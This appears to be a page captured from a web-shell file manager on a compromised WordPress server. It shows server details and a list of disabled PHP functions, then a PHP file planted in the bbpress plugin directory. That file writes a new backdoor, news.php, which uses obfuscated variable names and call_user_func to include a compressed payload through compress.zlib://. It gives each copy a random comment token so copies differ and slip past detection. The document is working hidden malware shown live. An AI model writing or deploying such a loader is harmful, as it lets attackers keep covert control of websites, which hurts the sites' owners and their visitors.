HEX
Server: nginx/1.16.1
System: Linux VM-0-14-centos 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User: www (1000)
PHP: 8.3.31
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/www.sceybwg.com/wp-content/plugins/bbpress/new.php
<?php /* I7DsMp7pXwCawT5 */ ?>
<?php
/**
 * Generate a random string similar to the original comment token.
 * Length: 40–50 characters, mix of letters, numbers, and symbols.
 */
function randomCommentToken($length = 44) {
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789~!@#$%^&*()-_=+{}[]|:;<>?,./';
    $token = '';
    for ($i = 0; $i < $length; $i++) {
        $token .= $chars[random_int(0, strlen($chars) - 1)];
    }
    return $token;
}

// Generate a new random token
$randomToken = randomCommentToken(44);  // similar length to the original

// The PHP code template (the same logic but with random comment)
$phpCode = <<<PHP
<?php
# {$randomToken}

\$bxoskw = function(\$p) { include \$p; };
\$stfhae = 'compress.zlib://ll2.gz';
call_user_func(\$bxoskw, \$stfhae);
?>
PHP;

// Write the generated code to a new file (e.g., "random_script.php")
$newFile = 'news.php';
file_put_contents($newFile, $phpCode);

echo "Generated file: $newFile with random token: $randomToken\n";
?>